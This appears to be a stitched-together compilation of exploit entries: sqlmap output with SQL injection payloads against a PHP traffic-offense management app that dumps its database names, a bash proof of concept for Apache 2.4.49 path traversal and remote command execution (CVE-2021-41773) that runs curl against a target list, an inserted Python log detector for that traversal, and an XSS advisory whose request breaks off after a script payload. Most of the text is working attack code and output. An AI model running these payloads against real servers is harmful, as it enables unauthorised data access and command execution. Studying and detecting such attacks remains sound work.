2021-08-18T15:00*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

# Using the sqlmap utility

C:\Users\Hubert\Desktop\sqlmapproject-sqlmap-24e3b6a>sqlmap.py --level=5 --risk=3 --dbms=MySQL -r C:\Users\Hubert\Desktop\0day\sql2 --proxy=http://127.0.0.1:8090
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.5.9.6#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:52:47 /2021-10-07/

[05:52:47] [INFO] parsing HTTP request from 'C:\Users\Hubert\Desktop\0day\sql2'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q]
Multipart-like data found in POST body. Do you want to process it? [Y/n/q]
[05:52:51] [INFO] testing connection to the target URL
[...]

---
Parameter: MULTIPART #4* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload:
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652' RLIKE (SELECT (CASE WHEN (8015=8015) THEN '' ELSE 0x28 END)) AND 'howi'='howi
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload:
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652' AND (SELECT 4940 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(4940=4940,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'zvbh'='zvbh
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload:
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652' AND (SELECT 7241 FROM (SELECT(SLEEP(5)))rEqK) AND 'CONm'='CONm
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

Parameter: MULTIPART #5* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload:
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3' AND 4015=4015 AND 'mPLR'='mPLR
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload:
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1
-----------------------------7900788429998101281579901385
Content-Disposition:
form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3' AND (SELECT 6830 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(6830=6830,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pbeA'='pbeA -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 
Content-Disposition: form-data; name="offense_id[]" 3' AND (SELECT 5446 FROM (SELECT(SLEEP(5)))QMKi) AND 'GfhC'='GfhC -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Parameter: MULTIPART #6* ((custom) POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001' RLIKE (SELECT (CASE WHEN (7186=7186) THEN '' ELSE 0x28 END)) AND 'rwJI'='rwJI 
-----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001' AND (SELECT 2971 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(2971=2971,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OeqR'='OeqR -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 
Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001' AND (SELECT 5527 FROM (SELECT(SLEEP(5)))GfWJ) AND 'GtGB'='GtGB -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Parameter: MULTIPART #2* ((custom) POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: 
-----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1' RLIKE (SELECT (CASE WHEN (8485=8485) THEN '' ELSE 0x28 END)) AND 'CyNe'='CyNe -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 
-----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1' AND (SELECT 6653 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(6653=6653,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'tCsu'='tCsu -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: 
form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1' AND (SELECT 6178 FROM (SELECT(SLEEP(5)))CQxQ) AND 'MljD'='MljD -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Parameter: MULTIPART #3* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George 
-----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1' AND 5855=5855 AND 'broT'='broT -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1' AND (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT 
(ELT(9644=9644,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'zaBh'='zaBh -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1' AND (SELECT 4422 FROM (SELECT(SLEEP(5)))wQes) AND 'GuRX'='GuRX -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; 
name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- [...] # Dump user, used database, all databases on the server using sqlmap C:\Users\Hubert\Desktop\sqlmapproject-sqlmap-24e3b6a>sqlmap.py --level=5 --risk=3 -r C:\Users\Hubert\Desktop\0day\sql2 --dbms=MySQL --current-user --current-db --dbs --batch [...] [06:06:23] [INFO] testing MySQL [06:06:23] [INFO] confirming MySQL [06:06:24] [WARNING] reflective value(s) found and filtering out [06:06:24] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.48, PHP 7.4.23 back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) [06:06:24] [INFO] fetching current user [06:06:24] [INFO] resumed: 'root@localhost' current user: 'root@localhost' [06:06:24] [INFO] fetching current database [06:06:24] [INFO] retrieved: 'traffic_offense_db' current database: 'traffic_offense_db' [06:06:24] [INFO] fetching database names [06:06:24] [INFO] retrieved: 'information_schema' [06:06:24] [INFO] retrieved: 'mysql' [06:06:24] [INFO] retrieved: 'performance_schema' [06:06:24] [INFO] retrieved: 'phpmyadmin' [06:06:24] [INFO] retrieved: 'test' [06:06:24] [INFO] retrieved: 'test2' [06:06:24] [INFO] retrieved: 'traffic_offense_db' available databases [7]: [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test [*] test2 [*] traffic_offense_db [06:06:24] [INFO] fetched data logged to text files under 'C:\Users\Hubert\AppData\Local\sqlmap\output\localhost' [*] ending @ 06:06:24 /2021-10-07/
-
Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
# Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage: https://apache.org/
# Version: 2.4.49
# Tested on: 2.4.49
# CVE : CVE-2021-41773
# Credits: Ash Daulton and the cPanel Security Team

#!/bin/bash
# Usage check: both the target list and the path are required
# (the original tested the two arguments as separate commands, so only $2 was checked)
if [[ -z $1 || -z $2 ]]; then
    echo "Set [TARGET-LIST.TXT] [PATH] [COMMAND]"
    echo "./PoC.sh targets.txt /etc/passwd"
    exit
fi

for host in $(cat "$1"); do
    echo "$host"
    # --path-as-is keeps the encoded dot segments from being normalised by curl;
    # the POST body is only used when $2 is an interpreter such as /bin/sh
    curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"
done

# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoami
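A log-side detector for the traversal shape this PoC uses, added here as an illustration (it is not part of Lucas Souza's PoC): it percent-decodes each request target, counts climbing segments, and ranks encoded dots under /cgi-bin/ highest. The access-log lines are constructed; the RCE variant carries its command in the POST body, which a standard access log does not record, so only the URL pattern is matched.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not from the advisory). The third request
# reproduces the URL shape of the PoC above: /cgi-bin/.%2e/ followed by
# nine %2e%2e/ segments and the requested file.
TRAVERSAL_TARGET = "/cgi-bin/.%2e/" + "%2e%2e/" * 9 + "etc/passwd"
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [07/Oct/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 612',
    '10.0.0.5 - - [07/Oct/2021:10:01:03 +0000] "GET /cgi-bin/printenv HTTP/1.1" 200 312',
    f'10.0.0.9 - - [07/Oct/2021:10:02:11 +0000] "POST {TRAVERSAL_TARGET} HTTP/1.1" 200 1853',
    '10.0.0.9 - - [07/Oct/2021:10:02:12 +0000] "GET /icons/../images/logo.png HTTP/1.1" 404 196',
])

# Request line inside a combined-format log entry
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def fully_decode(s, max_rounds=3):
    """Percent-decode until the value stops changing (bounded), so a
    double-encoded dot (%252e) folds to '.' just like a single %2e."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def traversal_depth(target):
    """Number of '..' path segments once the request target is decoded;
    0 means the path never climbs."""
    path = target.split("?", 1)[0]
    return sum(1 for seg in fully_decode(path).split("/") if seg == "..")


def classify(target):
    """Return (depth, severity). 'high' is the CVE-2021-41773 shape:
    percent-encoded dot segments under the CGI alias, which 2.4.49
    failed to normalise; 'medium' is encoded traversal elsewhere;
    'low' is a literal '..' that normalisation handles."""
    depth = traversal_depth(target)
    if depth == 0:
        return 0, None
    raw_path = target.split("?", 1)[0].lower()
    if "%2e" in raw_path or "%25" in raw_path:
        return depth, "high" if raw_path.startswith("/cgi-bin/") else "medium"
    return depth, "low"


def scan_access_log(text):
    """Walk log lines and return one finding per climbing request."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        depth, severity = classify(m.group("target"))
        if severity is None:
            continue
        findings.append({
            "line": lineno,
            "client": line.split(" ", 1)[0],
            "method": m.group("method"),
            "depth": depth,
            "severity": severity,
            "decoded": fully_decode(m.group("target")),
        })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['severity']:6} depth={f['depth']:2} "
              f"{f['client']} {f['method']} {f['decoded']}")
```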
-
Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated)
# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### XSS Stored and XSS Reflected
# All requests can be sent by both an authenticated and a non-authenticated user

# XSS Stored - example vulnerable pages and parameters:
* The entire application is susceptible to Stored XSS; below are examples of pages and parameters
* An SVG file carrying JavaScript can be uploaded at every upload point in the web app
* The malicious code can be added from an admin account, a regular user account or without authentication; only the request is needed
* http://localhost/traffic_offense/admin/?page=user
  Parameters:
  - firstname
  - lastname
  - user image - SVG file with JavaScript code - XSS
* http://localhost/traffic_offense/classes/Master.php?f=save_offense_record
  Parameters:
  - date_created
  - ticket_no
  - officer_id
  - officer_name
  - status
  - remarks
  - SVG file with JavaScript code - XSS
* The whole application is vulnerable

# XSS Reflected - example vulnerable pages and parameters:
* http://localhost/traffic_offense/admin/?page
  Parameters:
  - page
* http://localhost/traffic_offense/classes/Login.php
  Parameters:
  - username
  - password
* http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present]
  Parameters:
  - id
* http://localhost/traffic_offense/classes/Master.php
  Parameters:
  - id
* http://localhost/traffic_offense/classes/Users.php
  Parameters:
  - id

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------
## Example 1 - XSS Reflected
# Request using POST method, payload is in the parameter value id

POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------21986352462593413643786432583
Content-Length: 1061
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=user
Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------21986352462593413643786432583
Content-Disposition: form-data; name="id"

13<script>alert(1)</script>37
